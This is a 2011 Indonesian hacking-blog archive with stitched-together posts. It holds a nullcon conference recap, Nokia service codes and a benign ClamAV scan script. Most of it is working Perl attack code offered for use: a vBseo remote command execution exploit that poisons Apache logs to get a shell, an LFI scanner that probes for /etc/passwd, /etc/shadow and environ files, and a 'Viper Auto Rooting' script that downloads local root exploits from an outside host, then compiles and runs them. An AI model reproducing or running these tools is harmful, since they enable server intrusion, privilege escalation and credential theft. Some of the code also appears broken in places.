In its second year, nullcon 2011 is now an international security conference that witnesses the participation of India’s top whitehat hackers. Organized by the null information security community, nullcon 2011 is being held at The RETREAT by Zuri, Goa. With twin parallel tracks that cover various aspects such as technical tracks, security trend debates, research papers and CXO sessions , this is an event that sees participation from hackers— desi as well as international.
With tracks like Desi Jugaad which includes India-specific hacks, the event promises insights worth exploring for the security enthusiast as well, rather than just pure-play infosec. As part of our detailed nullcon Dwitiya coverage, we have put together some of the hottest topics of Day Zero. These presentations examine some of the hottest challenges—right from exploiting SCADA systems and building intelligence analysis systems to reversing Microsoft patches for analysis of vulnerable code. Here are some of the highlights of nullcon 2011’s Day Zero.
Presenter: Jeremy Brown
During this session of nullcon 2011, Jeremy Brown of Tenable Network Security lays bare the vulnerabilities that surround SCADA software as well as the vendor apathy which makes these systems so vulnerable. Brown also conducts the demo of a live SCADA system exploit as part of this session. With threats like Stuxnet highlighting the need for secure SCADA systems, this is one presentation that you cannot afford to mix.
Presenter: Harsimran Walia
Application Developer Harsimran Walia’s paper details identification of vulnerable code files in Microsoft solutions through reverse engineering of patches and files for these products. The paper puts forward the need to leverage this process for creation of vulnerability signatures, an approach which is superior to the use of exploit signatures for making undisclosed exploit and patch verification.
Presenter: Fyodor Yarochkin
As part of this nullcon 2011 workshop, security analyst Fyodor Yarochkin from Armorize Technologies exhibits how open source tools can be used to mine Internet data, organize and tag it for extraction of meaningful information. This hands-on workshop examines how intelligence analysis systems can be built using various open source solutions such as Nutch, solr, lucene, Soghun (machine learning framework), hadoop and netglub.
(Article courtesy: http://searchsecurity.techtarget.in)
Cheers
3ps!l0nLaMbDa
02 July 2011
deadc0de Editor v0.1
Credits : thank's to all staff and member deadc0de-team , nyubicrew mildnet, and you
Source c0de :
Baca Selengkapnya...
deadc0de Editor v0.1
Source c0de :
Screen shoot :
Sebagai bahan pembelajaran, saya mempersilahkan teman² untuk mendownload, memperbanyak atau merubah isi file yang telah saya buat. Lebih bagus lagi jika ada yg mengembangkansource c0de ini ^_^ saya akan sangat berterima kasih
Download Source : deadc0de_Edittor.py
29 June 2011
c0de rahasia GSM Nokia
Berikut ini adalah kode-kode yang dapat Anda gunakan pada ponsel Nokia.
(Resiko ditanggung sendiri) wkwowkwowkwowkwkwowkwkw kidding =)) =))
tekan kode-kode berikut pada layar utama :
2. Menampilkan Bulan dan Tahun Industri
3. Menampilkan (jika ada) tanggal dimana ponsel itu dibeli (MMYY)
4. Menampilkan tanggal terakhir perbaikan - jika ditemukan (0000)
5. Menunjukkan timer masa pakai telepon (waktu berlalu sejak mulai terakhir)
Ingat resiko ditanggung sendiri wakakakakakakakakakakakakakkak
#kkkkkkkkkkkkkkaaaaaaaaaaaaabbbbbbbbbooooooorrrrrrrrrrrr :p
Baca Selengkapnya...
c0de rahasia GSM Nokia
(Resiko ditanggung sendiri) wkwowkwowkwowkwkwowkwkw kidding =)) =))
tekan kode-kode berikut pada layar utama :
- *#06# untuk memeriksa IMEI (International Mobile Equipment Identity).
- *#7780# reset/kembalikan pengaturan awal (pengaturan pabrik)
- *#67705646# Ini akan menghapus tampilan LCD (operator logo).
- *#0000# Untuk melihat versi perangkat lunak.
- *#2820# alamat perangkat Bluetooth.
- *#746025625# pengaturan waktu pada kartu Sim statusnya diperbolehkan.
- *#Pw+1234567890+1# Menunjukkan jika kartu Sim memiliki batasan-batasan tertentu.
- *#92702689# - membawa Anda ke menu rahasia dimana Anda dapat menemukan beberapa informasi di bawah ini :
2. Menampilkan Bulan dan Tahun Industri
3. Menampilkan (jika ada) tanggal dimana ponsel itu dibeli (MMYY)
4. Menampilkan tanggal terakhir perbaikan - jika ditemukan (0000)
5. Menunjukkan timer masa pakai telepon (waktu berlalu sejak mulai terakhir)
- *#3370# - Enhanced Full Rate Codec (EFR) aktivasi. Meningkatkan kekuatan sinyal, penerimaan sinyal yang lebih baik. Hal ini juga membantu jika kamu ingin menggunakan GPRS dan layanan yang tidak merespons atau terlalu lambat. Baterai ponsel akan terkuras lebih cepat (Lebih cepat Lowbet).
- *#3370* - (EFR) nonaktifkan. Handphone akan restart secara otomatis. Meningkatkan masa pakai baterai sebesar 30% karena ponsel menerima sinyal kurang dari jaringan.
- *#4720# - Half Codec Tingkat aktivasi.
- *#4720* - Half Rate Codec penonaktifan. Telepon akan otomatis restart.
- Jika Anda lupa kode wallet untuk ponsel Nokia S60, bisa menggunakan ulang kode : * # 7370925538 # Catatan : data Anda dalam wallet akan terhapus. Handphone akan meminta kode kunci Anda. Kode default kunci adalah: 12345 Tekan * # 3925538 # untuk menghapus isi dan kode wallet.
- Aktifkan penyedia layanan dengan cara : Insert Sim Card, hidupkan ponsel dan tekan vol up (tanda panah) selama 3 detik, harus mengirimkan kode pin. Tekan C, kemudian tekan * pesan singkat, tekan * lagi dan 04 * pin * pin * pin # \
- *#7328748263373738# reset kode keamanan. Standar kode keamanan adalah 12345
Ingat resiko ditanggung sendiri wakakakakakakakakakakakakakkak
#kkkkkkkkkkkkkkaaaaaaaaaaaaabbbbbbbbbooooooorrrrrrrrrrrr :p
ClamAV - The free Anti Virus solution for Windows on Linux
Why do you want to install an Windows anti-virus scanner on Linux?
Well there can be many reasons. You have a linux file-server that host a samba-share to some windows clients? You might have a mail-server and you want the mails to be scanned?
ClamAV is a free GPLed anti-virus solution which provides a lot of advantages when installed in Linux. Sticking to the philosophy of linux, it contains a set of command line tools which can be used to check if a file on your system is infected by a virus.
Installation is easy
OR
ClamAV basically installs three binary tools on your system (in the /usr/bin directory), them being :
First thing to do is update the virus database:
Now you can do a scan
To mak things easy for myself, I put everything in a script:
Based on a script by Devon Hillard
Baca Selengkapnya...
ClamAV - The free Anti Virus solution for Windows on Linux
Well there can be many reasons. You have a linux file-server that host a samba-share to some windows clients? You might have a mail-server and you want the mails to be scanned?
ClamAV is a free GPLed anti-virus solution which provides a lot of advantages when installed in Linux. Sticking to the philosophy of linux, it contains a set of command line tools which can be used to check if a file on your system is infected by a virus.
Installation is easy
yum install clamavOR
apt-get install clamavemerge app-antivirus/clamavClamAV basically installs three binary tools on your system (in the /usr/bin directory), them being :
- freshclam - As you know an anti-virus solution is only as good as the latest virus updates it has. This tool is used to update the virus databases on your system. It downloads the latest virus updates from the internet and keeps your anti-virus solution upto date.
- clamscan - This is the tool that actually checks your files to see if they are infected.
- sigtool - When you download the latest virus updates from the net, there should be a way of verifying the validity of the update. This is achieved by the sigtool. It is used to verify the digital signatures of databases and list virus signature names among other things.
First thing to do is update the virus database:
freshclamNow you can do a scan
clamscan -r --log=/home/uname/virus_log -i /mnt/share/To mak things easy for myself, I put everything in a script:
Based on a script by Devon Hillard
#!/bin/bash
# email subject
SUBJECT="VIRUS DETECTED ON `hostname`!!!"
# Email To ?
EMAIL="my@email.com"
# Log location
LOG=/var/log/clamav/scan.log
DIR=/var/share/
check_scan () {
# Check the last set of results. If there are any "Infected" counts that aren't zero,
# we have a problem.
if [ `tail -n 12 ${LOG} | grep Infected | grep -v 0 | wc -l` != 0 ]
then
EMAILMESSAGE=`mktemp /tmp/virus-alert.XXXXX`
echo "To: ${EMAIL}" >> ${EMAILMESSAGE}
echo "From: alert@domain.com" >> ${EMAILMESSAGE}
echo "Subject: ${SUBJECT}" >> ${EMAILMESSAGE}
echo "Importance: High" >> ${EMAILMESSAGE}
echo "X-Priority: 1" >> ${EMAILMESSAGE}
echo "`tail -n 50 ${LOG}`" >> ${EMAILMESSAGE}
sendmail -t < ${EMAILMESSAGE}
fi
}
#first update virus-db
freshclam
#the actual scan
clamscan -r ${DIR} --quiet --infected --log=${LOG}
#check results
check_scan
25 June 2011
Remote Command Execution vBseo 3.1.0
#!/usr/bin/perl
####################################################################
# vBseo 3.1.0 (vbseo.php vbseourl) Remote Command Execution Exploit
# vendor: http://www.vbseo.com/
#
# Author: Jose Luis Gongora Fernandez (a.k.a) JosS
# twitter: @JossGongora
# mail: joss.xroot(0x40)gmail(0x2e)com
# site: http://www.hack0wn.com/
#
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# thanks: CWH Underground
#
####################################################################
# OUTPUT:
#
# Trying to Inject the Code...
# Successfully injected in ../../../../../../../var/log/apache2/access.log
#
# [shell]:~$ id
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
# [shell]:~$ uname -a
# Linux mediapc 2.6.18-6-686 #1 SMP Sat Dec 27 09:31:05 UTC 2008 i686 GNU/Linux
# [shell]:~$ exit
# joss@h4x0rz:~/Desktop$
use LWP::UserAgent;
use IO::Socket;
use LWP::Simple;
@apache=(
"../../../../../../../apache/logs/error.log",
"../../../../../../../apache/logs/access.log",
"../../../../../../../apache/logs/error.log",
"../../../../../../../apache/logs/access.log",
"../../../../../../../apache/logs/error.log",
"../../../../../../../apache/logs/access.log",
"../../../../../../../etc/httpd/logs/acces_log",
"../../../../../../../etc/httpd/logs/acces.log",
"../../../../../../../etc/httpd/logs/error_log",
"../../../../../../../etc/httpd/logs/error.log",
"../../../../../../../var/www/logs/access_log",
"../../../../../../../var/www/logs/access.log",
"../../../../../../../usr/local/apache/logs/access_log",
"../../../../../../../usr/local/apache/logs/access.log",
"../../../../../../../var/log/apache/access_log",
"../../../../../../../var/log/apache2/access_log",
"../../../../../../../var/log/apache/access.log",
"../../../../../../../var/log/apache2/access.log",
"../../../../../../../var/log/access_log",
"../../../../../../../var/log/access.log",
"../../../../../../../var/www/logs/error_log",
"../../../../../../../var/www/logs/error.log",
"../../../../../../../usr/local/apache/logs/error_log",
"../../../../../../../usr/local/apache/logs/error.log",
"../../../../../../../var/log/apache/error_log",
"../../../../../../../var/log/apache2/error_log",
"../../../../../../../var/log/apache/error.log",
"../../../../../../../var/log/apache2/error.log",
"../../../../../../../var/log/error_log",
"../../../../../../../var/log/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/access_log"
);
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print "#######################################################################
";
print "# vBseo 3.1.0 (vbseo.php vbseourl) Remote Command Execution Exploit #
";
print "#######################################################################
";
if (!$ARGV[0])
{
print "Usage: perl exploit.pl [host]
";
print " perl exploit.pl localhost
";
exit;}
$host=$ARGV[0];
$path="/vbseo.php?vbseoembedd=1&vbseourl="; # change if it is necesary
# if ( $host =~ /^http:/ ) {$host =~ s/http:////g;}
print "
Trying to Inject the Code...
";
$CODE="";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.
";
print $socket "GET /images/"."##%$$%##".$CODE."##%$$%##" . "HTTP/1.1";
print $socket "Host: ".$host."
";
print $socket "Connection: close
";
close($socket);
if ( $host !~ /^http:/ ) {$host = "http://" . $host;}
foreach $getlog(@apache)
{
chomp($getlog);
$find= $host.$path.$getlog; # $find= $host.$path.$getlog."";
$xpl = LWP::UserAgent->new() or die "Could not initialize browser
";
$req = HTTP::Request->new(GET => $find);
$res = $xpl->request($req);
$info = $res->content;
if($info =~ /##\%$$\%##/) # change if it is necesary
{print "Successfully injected in $getlog
";$log=$getlog; last;}
}
print "[shell]:~$ ";
chomp( $cmd = );
while($cmd !~ "exit") {
$shell= $host.$path.$log."&cmd=$cmd"; # $shell= $host.$path.$log."&cmd=$cmd";
$xpl = LWP::UserAgent->new() or die "Could not initialize browser
";
$req = HTTP::Request->new(GET => $shell);
$res = $xpl->request($req);
$info = $res->content;
if ($info =~ /##%$$%##(.*?)##%$$%##/sg)
{print $1;}
print "[shell]:~$ ";
chomp( $cmd = );
}
19 June 2011
LFI Scanner 3.0
#!/usr/bin/perl
#
# ////////////////////////////////////
# Viper LFI Scanner Ver. 3.0
# ////////////////////////////////////
#
# Title : Viper Lfi Scanner Ver. 3.0
# Author: Bl4ck.Viper
# From : Azarbycan
# Date : 2010/08/27
# Category : Scanner
# Home : www.Skote-vahshat.com
# Emails : Bl4ck.Viper@Yahoo.com , Bl4ck.Viper@Hotmail.com , Bl4ck.Viper@Gmail.com
#
#
# Description :Log , Environ , Passwd File Scanner
#
#
#*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
use HTTP::Request;
use LWP::UserAgent;
system ("cls");
print "\t\t/////////////////////////////////////////////////\n";
print "\t\t_________________________________________________\n";
print "\t\t\t Viper LFI Scanner Ver. 3.0\n";
print "\t\t\t Coded By Bl4ck.Viper\n";
print "\t\t\t Made In Azarbycan\n";
print "\t\t\t Version In English\n";
print "\t\t_________________________________________________\n";
print "\n\n";
sleep (1);
print "\t\t\t\t WELCOME\n";
print "\n\n";
menu:;
print "\tMenu:\n";
print "\t ID[1]=>Passwd,Log";
print "\t[Scan Files Of /etc/ Directory]\n";
print "\t ID[2]=>Environ";
print "\t\t[Scan Environ File For Inject Shell By U-Agent]\n";
print"\n";
print "\t\t Select ID For Start Scanner :";
$menu = <>;
if ($menu =~ /1/){
goto lfi;
}
if ($menu =~ /2/){
goto env;
}
else {
print"\n\n";
print "\t\tUnknow Command\n";
goto menu;
};
lfi:;
print "\n\n";
print "\t\t\tWelcome To /etc/ Section\n\n";
print "\t Insert Target (ex: http://www.site.com/index.php?page=)\n";
print "\t Target :";
$host=;
chomp($host);
if($host !~ /http:\/\//) { $host = "http://$host"; };
print "\n\n";
print "\t\t*-*-*-*-*-* WORKING IN PROGRESS *-*-*-*-*-*\n";
print "\n\n";
@lfi = ('../etc/passwd',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../../etc/passwd',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../../etc/passwd',
'../etc/shadow',
'../../etc/shadow',
'../../../etc/shadow',
'../../../../etc/shadow',
'../../../../../etc/shadow',
'../../../../../../etc/shadow',
'../../../../../../../etc/shadow',
'../../../../../../../../etc/shadow',
'../../../../../../../../../etc/shadow',
'../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../../etc/shadow',
'../etc/shadow',
'../../etc/shadow',
'../../../etc/shadow',
'../../../../etc/shadow',
'../../../../../etc/shadow',
'../../../../../../etc/shadow',
'../../../../../../../etc/shadow',
'../../../../../../../../etc/shadow',
'../../../../../../../../../etc/shadow',
'../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../../etc/shadow',
'../etc/group',
'../../etc/group',
'../../../etc/group',
'../../../../etc/group',
'../../../../../etc/group',
'../../../../../../etc/group',
'../../../../../../../etc/group',
'../../../../../../../../etc/group',
'../../../../../../../../../etc/group',
'../../../../../../../../../../etc/group',
'../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../../etc/group',
'../etc/group',
'../../etc/group',
'../../../etc/group',
'../../../../etc/group',
'../../../../../etc/group',
'../../../../../../etc/group',
'../../../../../../../etc/group',
'../../../../../../../../etc/group',
'../../../../../../../../../etc/group',
'../../../../../../../../../../etc/group',
'../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../../etc/group',
'../etc/security/group',
'../../etc/security/group',
'../../../etc/security/group',
'../../../../etc/security/group',
'../../../../../etc/security/group',
'../../../../../../etc/security/group',
'../../../../../../../etc/security/group',
'../../../../../../../../etc/security/group',
'../../../../../../../../../etc/security/group',
'../../../../../../../../../../etc/security/group',
'../../../../../../../../../../../etc/security/group',
'../etc/security/group',
'../../etc/security/group',
'../../../etc/security/group',
'../../../../etc/security/group',
'../../../../../etc/security/group',
'../../../../../../etc/security/group',
'../../../../../../../etc/security/group',
'../../../../../../../../etc/security/group',
'../../../../../../../../../etc/security/group',
'../../../../../../../../../../etc/security/group',
'../../../../../../../../../../../etc/security/group',
'../etc/security/passwd',
'../../etc/security/passwd',
'../../../etc/security/passwd',
'../../../../etc/security/passwd',
'../../../../../etc/security/passwd',
'../../../../../../etc/security/passwd',
'../../../../../../../etc/security/passwd',
'../../../../../../../../etc/security/passwd',
'../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../../etc/security/passwd',
'../etc/security/passwd',
'../../etc/security/passwd',
'../../../etc/security/passwd',
'../../../../etc/security/passwd',
'../../../../../etc/security/passwd',
'../../../../../../etc/security/passwd',
'../../../../../../../etc/security/passwd',
'../../../../../../../../etc/security/passwd',
'../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../../etc/security/passwd',
'../etc/security/user',
'../../etc/security/user',
'../../../etc/security/user',
'../../../../etc/security/user',
'../../../../../etc/security/user',
'../../../../../../etc/security/user',
'../../../../../../../etc/security/user',
'../../../../../../../../etc/security/user',
'../../../../../../../../../etc/security/user',
'../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../../etc/security/user',
'../etc/security/user',
'../../etc/security/user',
'../../../etc/security/user',
'../../../../etc/security/user',
'../../../../../etc/security/user',
'../../../../../../etc/security/user',
'../../../../../../../etc/security/user',
'../../../../../../../../etc/security/user',
'../../../../../../../../../etc/security/user',
'../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../../etc/security/user');
foreach $scan(@lfi){
$url = $host.$scan;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($request);
if ($response->is_success && $response->content =~ /root:x:/) { $msg = Vulnerability;}
else { $msg = "Not Found";}
print "$scan..........[$msg]\n";
}
env:;
print "\n\n";
print "\t\t\tWelcom To Environ Section\n\n";
print "\t Insert Target (ex: http://www.site.com/index.php?page=)\n";
print "\t Target :";
$host=;
chomp($host);
if($host !~ /http:\/\//) { $host = "http://$host"; };
print "\n\n";
print "\t\t*-*-*-*-*-* WORKING IN PROGRESS *-*-*-*-*-*\n";
print "\n\n";
@env = ('../proc/self/environ',
'../../proc/self/environ',
'../../../proc/self/environ',
'../../../../proc/self/environ',
'../../../../../proc/self/environ',
'../../../../../../proc/self/environ',
'../../../../../../../proc/self/environ',
'../../../../../../../../proc/self/environ',
'../../../../../../../../../proc/self/environ',
'../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../../../proc/self/environ',
'../proc/self/environ',
'../../proc/self/environ',
'../../../proc/self/environ',
'../../../../proc/self/environ',
'../../../../../proc/self/environ',
'../../../../../../proc/self/environ',
'../../../../../../../proc/self/environ',
'../../../../../../../../proc/self/environ',
'../../../../../../../../../proc/self/environ',
'../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../../../proc/self/environ');
foreach $scan_env(@env){
$url = $host.$scan_env;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($request);
if ($response->is_success && $response->content =~ /HTTP_ACCEPT/ && $response->content =~ /HTTP_HOST/) { $msg = Vulnerability;}
else { $msg = "Not Found";}
print "$scan_env..........[$msg]\n";
}
# Bl4ck.Viper Turkish Hacker
# Copyright 2010 Black Viper Viper Auto-Rooting Script => Linux, SunOS, FreeBSD, and RedHat
#!/usr/bin/perl
#
# ==>> Viper Auto Rooting <<==
#
#
# ---------------------------------------------------------------------------------------------------------------------------
# Script : Perl
# By : Bl4ck.Viper
# From : Azarbycan (Turkish Man)(fardin Allahverdinajhand)
# Contact : Bl4ck.Viper@Gmail.Com , Bl4ck.Viper@Hotmail.Com , Bl4ck.Viper@Yahoo.Com
# Version : 2.0
# For Black Hat & Real Hackers
# ---------------------------------------------------------------------------------------------------------------------------
# ---------------------------------------------------------------------------------------------------------------------------
# For All Version Of Linux , SunOS , MacOS X , FreeBSD
# ---------------------------------------------------------------------------------------------------------------------------
#
print "\t\t\tViper Auto Rooting\n";
print "\t\t\tVersion : 2.0\n";
print "\n";
print "\n\n";
print "\t\t------------------------------------\n";
print "\t\t\tCoded By Bl4ck.Viper\n";
print "\t\t------------------------------------\n";
print "\t\t For See Commands type [help] :D\n";
print "\n";
command:;
print 'Viper@Localr00t#:';
$command =;
if ($command =~ /help/){
goto help
}
if ($command =~ /sysline/){
goto sysline
}
if ($command =~ /varline/){
goto varline
}
if ($command =~ /gccinfo/){
goto gccinfo
}
if ($command =~ /sysinfo/){
goto sysinfo
}
if ($command =~ /logc/){
goto logc
}
if ($command =~ /config/){
goto config
}
if ($command =~ /logs/){
goto logs
}
if ($command =~ /sysproc/){
goto sysproc
}
if ($command =~ /all/){
goto all
}
if ($command =~ /2.2.x/){
goto local2
}
if ($command =~ /2.4.x/){
goto local4
}
if ($command =~ /2.6.x/){
goto local6
}
if ($command =~ /freebsd-x/){
goto freebsd
}
if ($command =~ /mac-os-x/){
goto mac
}
if ($command =~ /red-x/){
goto red
}
if ($command =~ /sunos-x/){
goto sun
}
else{
print "Unknow Command !\n";
goto command
};
help:;
print "\t--------------------------------------------------------\n";
print "\t\tsysline\t\t[Go To System Command Line]\n";
print "\t\tvarline\t\t[Go To var.pl Command Line]\n";
print "\t\tsysinfo\t\t[Show System Information]\n";
print "\t\tsysproc\t\t[Show Running Proccess's]\n";
print "\t\tconfig\t\t[Show Config File]\n";
print "\t\tlogs\t\t[Show System Log File]\n";
print "\t\tall\t\t[Show All Localroots In Database]\n";
print "\t\tgccinfo\t\t[Check For gcc Installed Or Not Installed]\n";
print "\t\tlogc\t\t[Clear Server Log]\n";
print "\t\t2.2.x\t\t[Localroots of 2.2.x]\n";
print "\t\t2.4.x\t\t[Localroots of 2.4.x]\n";
print "\t\t2.6.x\t\t[Localroots of 2.6.x]\n";
print "\t\tfreebsd-x\t[Localroots of FreeBSD]\n";
print "\t\tmac-os-x\t[Localroots of MacOS X]\n";
print "\t\tred-x\t\t[Localroots of RedHat]\n";
print "\t\tsunos-x\t\t[Localroots of Sun Solaris OS]\n";
print "\t--------------------------------------------------------\n";
print "\n";
goto command;
sysline:;
print "system:";
$systemm = <>;
if ($systemm =~ /varline/){
goto varline
}
system("$systemm");
goto sysline;
varline:;
goto command;
all:;
print q{
2.2.27
2.2.x
2.4 2.6
2.4.17
2.4.18
2.4.19
2.4.20
2.4.21
2.4.22
2.4.22-10
2.4.23
2.4.24
2.4.25
2.4.26
2.4.29
2.4.x
2.6.2
2.6.4
2.6.5
2.6.7
2.6.8
2.6.9
2.6.9-22.sh
2.6.9-34
2.6.9-55
2.6.10
2.6.11
2.6.12
2.6.13
2.6.13-17-2
2.6.13-17-3
2.6.14
2.6.15
2.6.16
2.6.17
2.6.x
FreeBSD 4.4 - 4.6
FreeBSD 4.8
FreeBSD 5.3
Mac OS X
red-7.3
red-8.0
red-hat8.0-2
redhat 7.0
redhat 7.1
SunOS 5.7
SunOS 5.8
SunOS 5.9
SunOS 5.10
};
print "\n";
goto command;
local2:;
print "\t\tWelcome To 2.2.x Section\n";
system ("cd /tmp;mkdir 2.2.x;chmod 777 2.2.x;cd 2.2.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.2.x/elfcd1.c;gcc elfcd1.c -o elfcd1;chmod 777 elfcd1;./elfcd1");
system ("cd /tmp;mkdir 2.2.x;chmod 777 2.2.x;cd 2.2.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.2.x/mremap_pte;chmod 777 mremap_pte;./mremap_pte");
system ("cd /tmp;mkdir 2.2.x;chmod 777 2.2.x;cd 2.2.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.2.x/uselib24;chmod 777 uselib24;./uselib24");
system ("cd /tmp;mkdir 2.2.x;chmod 777 2.2.x;cd 2.2.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.2.x/ptrace24;chmod 777 ptrace24;./ptrace24");
system ("id");
local4:;
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/pwned.c;gcc pwned.c -o pwned;chmod 777 pwned;./pwned");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/kmod;chmod 777 kmod;./kmod");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/newlocal;chmod 777 newlocal;./newlocal");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/uselib24;chmod 777 uselib24;./uselib24");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/brk;chmod 777 brk;./brk");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/brk2;chmod 777 brk2;./brk2");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/ptrace;chmod 777 ptrace;./ptrace");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/ptrace-kmod;chmod 777 ptrace-kmod;./ptrace-kmod");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/2.4.22.c;gcc 2.4.22.c -o 2.4.22;chmod 777 2.4.22;./2.4.22");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/loginx;chmod 777 loginx;./loginx");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/hatorihanzo.c;gcc hatorihanzo.c -o hatorihanzo;chmod 777 hatorihanzo;./hatorihanzo");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/mremap_pte;chmod 777 mremap_pte;./mremap_pte");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/Linux-kernel-mremap.c;gcc Linux-kernel-mremap.c -o Linux-kernel-mremap;chmod 777 Linux-kernel-mremap;./Linux-kernel-mremap");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/uselib24;chmod 777 uselib24;./uselib24");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/expand_stack.c;gcc expand_stack.c -o expand_stack;chmod 777 expand_stack;./expand_stack");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/elflbl;chmod 777 elflbl;./elflbl");
system ("id");
local6:;
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/h00lyshit;chmod 777 h00lyshit;./h00lyshit");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/krad;chmod 777 krad;./krad");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/myptrace;chmod 777 myptrace;./myptrace");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/hudo.c;gcc hudo.c -o hudo;chmod 777 hudo;./hudo");
